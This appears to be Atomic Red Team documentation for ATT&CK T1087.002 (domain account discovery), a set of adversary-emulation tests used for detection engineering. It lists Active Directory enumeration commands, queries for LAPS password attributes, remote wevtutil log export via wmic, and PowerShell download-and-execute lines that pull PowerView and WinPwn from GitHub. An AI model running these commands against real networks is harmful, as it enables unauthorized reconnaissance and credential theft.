T1087.002
Account Discovery: Domain Account
Description from ATT&CK
Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
Commands such as
net user /domainandnet group /domainof the Net utility,dscacheutil -q groupon macOS, andldapsearchon Linux can list domain users and groups. PowerShell cmdlets includingGet-ADUserandGet-ADGroupMembermay enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
Atomic Tests
- Atomic Test #1: Enumerate all accounts (Domain)
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain)
- Atomic Test #3: Enumerate logged on users via CMD (Domain)
- Atomic Test #4: Automated AD Recon (ADRecon)
- Atomic Test #5: Adfind -Listing password policy
- Atomic Test #6: Adfind - Enumerate Active Directory Admins
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain)
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation
- Atomic Test #11: Get-DomainUser with PowerView
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery
- Atomic Test #14: Enumerate Root Domain linked policies Discovery
- Atomic Test #15: WinPwn - generaldomaininfo
- Atomic Test #16: Kerbrute - userenum
- Atomic Test #17: Wevtutil - Discover NTLM Users Remote
- Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties
- Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
- Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
- Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties
- Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
- Atomic Test #23: Active Directory Domain Search
- Atomic Test #24: Account Enumeration with LDAPDomainDump
Atomic Test #1: Enumerate all accounts (Domain)
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
Supported Platforms: Windows
auto_generated_guid: 6fbc9e68-5ad7-444a-bd11-8bf3136c477e
Attack Commands: Run with command_prompt!
net user /domain
net group /domainAtomic Test #2: Enumerate all accounts via PowerShell (Domain)
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
Supported Platforms: Windows
auto_generated_guid: 8b8a6449-be98-4f42-afd2-dedddc7453b2
Attack Commands: Run with powershell!
net user /domain
get-localgroupmember -group Users
get-aduser -filter *Atomic Test #3: Enumerate logged on users via CMD (Domain)
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
Supported Platforms: Windows
auto_generated_guid: 161dcd85-d014-4f5e-900c-d3eaae82a0f7
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| computer_name | Name of remote system to query | string | %COMPUTERNAME% |
Attack Commands: Run with command_prompt!
query user /SERVER:#{computer_name}Atomic Test #4: Automated AD Recon (ADRecon)
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Supported Platforms: Windows
auto_generated_guid: 95018438-454a-468c-a0fa-59c800149b59
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| adrecon_path | Path of ADRecon.ps1 file | path | PathToAtomicsFolder\..\ExternalPayloads\ADRecon.ps1 |
Attack Commands: Run with powershell!
Invoke-Expression "#{adrecon_path}"Cleanup Commands
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -RecurseDependencies: Run with powershell!
Description: ADRecon must exist on disk at specified location (#{adrecon_path})
Check Prereq Commands
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"Atomic Test #5: Adfind -Listing password policy
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
Supported Platforms: Windows
auto_generated_guid: 736b4f53-f400-4c22-855d-1a6b5a551600
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string |
Attack Commands: Run with command_prompt!
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdpropertiesDependencies: Run with powershell!
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"Atomic Test #6: Adfind - Enumerate Active Directory Admins
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
Supported Platforms: Windows
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string |
Attack Commands: Run with command_prompt!
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}Dependencies: Run with powershell!
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"Atomic Test #7: Adfind - Enumerate Active Directory User Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string |
Attack Commands: Run with command_prompt!
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}Dependencies: Run with powershell!
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string |
Attack Commands: Run with command_prompt!
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}Dependencies: Run with powershell!
Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder..\ExternalPayloads\AdFind.exe)
Check Prereq Commands
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"Atomic Test #9: Enumerate Default Domain Admin Details (Domain)
This test will enumerate the details of the built-in domain admin account
Supported Platforms: Windows
auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
Attack Commands: Run with command_prompt!
net user administrator /domainAtomic Test #10: Enumerate Active Directory for Unconstrained Delegation
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
Supported Platforms: Windows
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | Domain FQDN | string | $env:UserDnsDomain |
| uac_prop | UAC Property to search | integer | 524288 |
Attack Commands: Run with powershell!
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}Dependencies: Run with powershell!
Description: PowerShell ActiveDirectory Module must be installed
Check Prereq Commands
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}Get Prereq Commands
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}Atomic Test #11: Get-DomainUser with PowerView
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
Supported Platforms: Windows
auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
Attack Commands: Run with powershell!
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verboseAtomic Test #12: Enumerate Active Directory Users with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
Supported Platforms: Windows
auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
Attack Commands: Run with powershell!
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Supported Platforms: Windows
auto_generated_guid: 7ab0205a-34e4-4a44-9b04-e1541d1a57be
Attack Commands: Run with powershell!
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}Atomic Test #14: Enumerate Root Domain linked policies Discovery
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
Supported Platforms: Windows
auto_generated_guid: 00c652e2-0750-4ca6-82ff-0204684a6fe4
Attack Commands: Run with powershell!
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}Atomic Test #15: WinPwn - generaldomaininfo
Gathers general domain information using the generaldomaininfo function of WinPwn
Supported Platforms: Windows
auto_generated_guid: ce483c35-c74b-45a7-a670-631d1e69db3d
Attack Commands: Run with powershell!
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutputAtomic Test #16: Kerbrute - userenum
Enumerates active directory usernames using the userenum function of Kerbrute
Supported Platforms: Windows
auto_generated_guid: f450461c-18d1-4452-9f0d-2c42c3f08624
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| Domain | Domain that is being tested against | string | $env:USERDOMAIN |
| DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain |
Attack Commands: Run with powershell!
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"Dependencies: Run with powershell!
Description: kerbrute.exe must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"Description: username text file must exist in PathToAtomicsFolder..\ExternalPayloads.
Check Prereq Commands
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}Get Prereq Commands
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"Atomic Test #17: Wevtutil - Discover NTLM Users Remote
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. Reference
Supported Platforms: Windows
auto_generated_guid: b8a563d4-a836-4993-a74e-0a19b8481bfe
Attack Commands: Run with powershell!
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'Cleanup Commands
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtxAtomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: 394012d9-2164-4d4f-b9e5-acf30ba933fe
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| hostname | Name of the host | string | $env:computername |
Attack Commands: Run with powershell!
Get-ADComputer #{hostname} -Properties *Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: 6e85bdf9-7bc4-4259-ac0f-f0cb39964443
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| hostname | Name of the host | string | $env:computername |
Attack Commands: Run with powershell!
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTimeAtomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: ffbcfd62-15d6-4989-a21a-80bfc8e58bb5
Attack Commands: Run with powershell!
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: abf00f6c-9983-4d9a-afbc-6b1c6c6448e1
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
| domain | Domain of the host | string | $env:USERDOMAIN |
Attack Commands: Run with powershell!
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Supported Platforms: Windows
auto_generated_guid: 51a98f96-0269-4e09-a10f-e307779a8b05
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
| domain | Domain of the host | string | $env:USERDOMAIN |
Attack Commands: Run with powershell!
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTimeAtomic Test #23: Active Directory Domain Search
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
Supported Platforms: Linux
auto_generated_guid: 096b6d2a-b63f-4100-8fa0-525da4cd25ca
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| domain | The domain to be tested | string | example |
| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | test |
| user | username@domain of a user within the ad database | string | user@example.test |
| password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD! |
Attack Commands: Run with sh!
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dnDependencies: Run with sh!
Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
Check Prereq Commands
which ldapsearchGet Prereq Commands
echo ldapsearch not foundAtomic Test #24: Account Enumeration with LDAPDomainDump
This test uses LDAPDomainDump to perform account enumeration on a domain. Reference
Supported Platforms: Linux
auto_generated_guid: a54d497e-8dbe-4558-9895-44944baa395f
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username and domain to authenticate with | string | domain\user |
| target_ip | IP to connect to | string | 127.0.0.1 |
| password | Password to authenticate with | string | password |
Attack Commands: Run with sh!
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087Cleanup Commands
rm -rf /tmp/T1087/ 2>/dev/nullDependencies: Run with sh!
Description: Python3 must be installed
Check Prereq Commands
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;Get Prereq Commands
sudo apt-get -y install python3Description: Pip must be installed
Check Prereq Commands
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;Get Prereq Commands
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.pyDescription: The ldapdomaindump module must be installed
Check Prereq Commands
python3 -c 'import ldapdomaindump' 2>/dev/nullGet Prereq Commands
pip install ldapdomaindumpDescription: The future module must be installed
Check Prereq Commands
python3 -c 'import future' 2>/dev/nullGet Prereq Commands
pip install futureAtomic test(s) for this technique last updated: 2025-01-28 05:02:41 UTC